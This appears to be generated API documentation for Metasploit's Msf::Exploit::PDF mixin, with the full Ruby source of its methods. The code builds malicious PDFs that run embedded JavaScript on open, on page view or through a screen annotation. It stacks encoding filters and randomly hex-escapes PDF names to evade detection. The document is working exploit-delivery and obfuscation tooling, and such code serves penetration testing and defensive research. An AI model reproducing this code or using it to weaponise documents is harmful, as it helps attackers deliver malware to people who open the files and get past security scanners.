Module: Msf::Exploit::PDF

Defined in:
lib/msf/core/exploit/pdf.rb

Instance Method Summary collapse

Instance Method Details

#add_object(num, data) ⇒ Object


156
157
158
159
160
161
# File 'lib/msf/core/exploit/pdf.rb', line 156

def add_object(num, data)
  @xref << @pdf.length
  @pdf << ioDef(num)
  @pdf << data
  @pdf << endobj
end

#ASCII85Encode(stream) ⇒ Object


96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
# File 'lib/msf/core/exploit/pdf.rb', line 96

def ASCII85Encode(stream)
  eod = "~>"
  i = 0
  code = ""
  input = stream.dup

  while i < input.size do

    if input.length - i < 4
      addend = 4 - (input.length - i)
      input << "\0" * addend
    else
      addend = 0
    end

    inblock = (input[i].ord * 256**3 + input[i+1].ord * 256**2 + input[i+2].ord * 256 + input[i+3].ord)
    outblock = ""

    5.times do |p|
      c = inblock / 85 ** (4 - p)
      outblock << ("!"[0].ord + c).chr
      inblock -= c * 85 ** (4 - p)
    end

    outblock = "z" if outblock == "!!!!!" and addend == 0

    if addend != 0
      outblock = outblock[0,(4 - addend) + 1]
    end

    code << outblock
    i = i + 4
  end
  code << eod
end

#ASCIIHexWhitespaceEncode(str) ⇒ Object

Original Filters


33
34
35
36
37
38
39
40
41
42
# File 'lib/msf/core/exploit/pdf.rb', line 33

def ASCIIHexWhitespaceEncode(str)
  return str if not datastore['PDF::Obfuscate']
  result = ""
  whitespace = ""
  str.each_byte do |b|
    result << whitespace << "%02x" % b
    whitespace = " " * (rand(3) + 1)
  end
  result << ">"
end

#CreatePDF(js) ⇒ Object

Controller funtion, should be entrypoint for pdf exploits


217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
# File 'lib/msf/core/exploit/pdf.rb', line 217

def CreatePDF(js)
  strFilter = ""
  arrResults = []
  numIterations = 0
  arrEncodings = ['ASCII85','ASCIIHEX','FLATE','RUN']
  arrEncodings = arrEncodings.shuffle
  if datastore['PDF::MultiFilter'] < arrEncodings.length
    numIterations = datastore['PDF::MultiFilter']
  else
    numIterations = arrEncodings.length
  end
  for i in (0..numIterations-1)
    if i == 0
      arrResults = SelectEncoder(js,arrEncodings[i],strFilter)
      next
    end
    arrResults = SelectEncoder(arrResults[0],arrEncodings[i],arrResults[1])
  end
  case datastore['PDF::Method']
  when 'PAGE'
    pdf_with_page_exploit(arrResults[0],arrResults[1])
  when 'DOCUMENT'
    pdf_with_openaction_js(arrResults[0],arrResults[1])
  when 'ANNOTATION'
    pdf_with_annot_js(arrResults[0],arrResults[1])
  end
end

#endobjObject


202
203
204
# File 'lib/msf/core/exploit/pdf.rb', line 202

def endobj
  "endobj" << eol
end

#eolObject


198
199
200
# File 'lib/msf/core/exploit/pdf.rb', line 198

def eol
  "\x0d\x0a"
end

#finish_pdfObject


168
169
170
171
172
173
174
# File 'lib/msf/core/exploit/pdf.rb', line 168

def finish_pdf
  @xref_offset = @pdf.length
  @pdf << xref_table
  @pdf << trailer(1)
  @pdf << startxref
  @pdf
end

#header(version = '1.5') ⇒ Object

PDF building block functions


150
151
152
153
154
# File 'lib/msf/core/exploit/pdf.rb', line 150

def header(version = '1.5')
  hdr = "%PDF-1.5" << eol
  hdr << "%" << RandomNonASCIIString(4) << eol
  hdr
end

#initialize(info = {}) ⇒ Object


12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# File 'lib/msf/core/exploit/pdf.rb', line 12

def initialize(info = {})
super

register_options(
  [
    OptBool.new('PDF::Obfuscate', [ true, 'Whether or not we should obfuscate the output', true ]),
    OptString.new('PDF::Method', [ true, 'Select PAGE, DOCUMENT, or ANNOTATION' , 'DOCUMENT']),
    OptString.new('PDF::Encoder', [ true, 'Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX', 'ASCIIHEX']),
    OptInt.new('PDF::MultiFilter', [ true, 'Stack multiple encodings n times', 1]),
  ], Msf::Exploit::PDF
)

# We're assuming we'll only create one pdf at a time here.
@xref = []
@pdf = ''
end

#ioDef(id) ⇒ Object


206
207
208
# File 'lib/msf/core/exploit/pdf.rb', line 206

def ioDef(id)
  "%d 0 obj" % id
end

#ioRef(id) ⇒ Object


210
211
212
# File 'lib/msf/core/exploit/pdf.rb', line 210

def ioRef(id)
  "%d 0 R" % id
end

#nObfu(str) ⇒ Object


133
134
135
136
137
138
139
140
141
142
143
144
145
# File 'lib/msf/core/exploit/pdf.rb', line 133

def nObfu(str)
  return str if not datastore['PDF::Obfuscate']

  result = ""
  str.scan(/./u) do |c|
    if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
      result << "#%x" % c.unpack("C*")[0]
    else
      result << c
    end
  end
  result
end

#pdf_with_annot_js(js, strFilter) ⇒ Object

Create PDF with a malicious annotation


315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
# File 'lib/msf/core/exploit/pdf.rb', line 315

def pdf_with_annot_js(js,strFilter)
  @xref = []
  @pdf = ''

  @pdf << header

  add_object(1, nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << ">>")
  add_object(2, nObfu("<</Type/Outlines/Count 0>>"))
  add_object(3, nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>"))
  add_object(4, nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nObfu(" /Annots [") << ioRef(5) << nObfu("]>>"))
  add_object(5, nObfu("<</Type/Annot /Subtype /Screen /Rect [%s %s %s %s] /AA << /PO << /JS " % [rand(200),rand(200),rand(300),rand(300)]) << ioRef(6) << nObfu("/S /JavaScript >>>>>>"))
  compressed = js
  stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
  stream << "stream" << eol
  stream << compressed << eol
  stream << "endstream" << eol
  add_object(6, stream)

  finish_pdf
end

#pdf_with_openaction_js(js, strFilter) ⇒ Object

Create PDF with OpenAction implant Note: doesn't carry over if you try to merge the exploit PDF with an innocuous one


292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
# File 'lib/msf/core/exploit/pdf.rb', line 292

def pdf_with_openaction_js(js,strFilter)
  @xref = []
  @pdf = ''

  @pdf << header

  add_object(1, nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << ">>")
  add_object(2, nObfu("<</Type/Outlines/Count 0>>"))
  add_object(3, nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>"))
  add_object(4, nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nObfu(" /AA << /O << /JS ") << ioRef(5) << nObfu("/S /JavaScript >>>>>>"))
  compressed = js
  stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
  stream << "stream" << eol
  stream << compressed << eol
  stream << "endstream" << eol
  add_object(5, stream)

  finish_pdf
end

#pdf_with_page_exploit(js, strFilter) ⇒ Object

Create PDF with Page implant


269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
# File 'lib/msf/core/exploit/pdf.rb', line 269

def pdf_with_page_exploit(js,strFilter)
  @xref = []
  @pdf = ''

  @pdf << header
  add_object(1, nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << ">>")
  add_object(2, nObfu("<</Type/Outlines/Count 0>>"))
  add_object(3, nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>"))
  add_object(4, nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nObfu(" /AA << /O << /JS ") << ioRef(5) << nObfu("/S /JavaScript >>>>>>"))
  compressed = js
  stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
  stream << "stream" << eol
  stream << compressed << eol
  stream << "endstream" << eol
  add_object(5, stream)

  finish_pdf
end

#RandomNonASCIIString(count) ⇒ Object


88
89
90
91
92
93
94
# File 'lib/msf/core/exploit/pdf.rb', line 88

def RandomNonASCIIString(count)
  result = ""
  count.times do
    result << (rand(128) + 128).chr
  end
  result
end

#range_rand(min, max) ⇒ Object


163
164
165
166
# File 'lib/msf/core/exploit/pdf.rb', line 163

def range_rand(min,max)
  until min < r=rand(max); end
  return r
end

#RunLengthEncode(stream) ⇒ Object

Filters from Origami parser


47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# File 'lib/msf/core/exploit/pdf.rb', line 47

def RunLengthEncode(stream)
  eod = 128
  result = ""
  i = 0

  while i < stream.size
    #
    # How many identical bytes coming?
    #
    length = 1
    while i+1 < stream.size and length < eod and stream[i] == stream[i+1]
      length = length + 1
      i = i + 1
    end

    #
    # If more than 1, then compress them.
    #
    if length > 1
      result << (257 - length).chr << stream[i,1]

    #
    # Otherwise how many different bytes to copy ?
    #
    else
      j = i
      while j+1 < stream.size and (j - i + 1) < eod and stream[j] != stream[j+1]
        j = j + 1
      end

      length = j - i
      result << length.chr << stream[i, length+1]

      i = j
    end

    i = i + 1
  end
  result << eod.chr
end

#SelectEncoder(js, strEncode, strFilter) ⇒ Object

Select an encoder and build a filter specification


248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
# File 'lib/msf/core/exploit/pdf.rb', line 248

def SelectEncoder(js,strEncode,strFilter)
  case strEncode
  when 'ASCII85'
    js = ASCII85Encode(js)
    strFilter = "/ASCII85Decode"<<strFilter
  when 'ASCIIHEX'
    js = ASCIIHexWhitespaceEncode(js)
    strFilter = "/ASCIIHexDecode"<<strFilter
  when 'FLATE'
    js = Zlib::Deflate.deflate(js)
    strFilter = "/FlateDecode"<<strFilter
  when 'RUN'
    js = RunLengthEncode(js)
    strFilter = "/RunLengthDecode"<<strFilter
  end
  return js,strFilter
end

#startxrefObject


191
192
193
194
195
196
# File 'lib/msf/core/exploit/pdf.rb', line 191

def startxref
  ret = "startxref" << eol
  ret << @xref_offset.to_s << eol
  ret << "%%EOF" << eol
  ret
end

#trailer(root_obj) ⇒ Object


186
187
188
189
# File 'lib/msf/core/exploit/pdf.rb', line 186

def trailer(root_obj)
  ret = "trailer" << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj) << ">>" << eol
  ret
end

#xref_tableObject


176
177
178
179
180
181
182
183
184
# File 'lib/msf/core/exploit/pdf.rb', line 176

def xref_table
  ret = "xref" << eol
  ret << "0 %d" % (@xref.length + 1) << eol
  ret << "0000000000 65535 f" << eol
  @xref.each do |index|
    ret << "%010d 00000 n" % index << eol
  end
  ret
end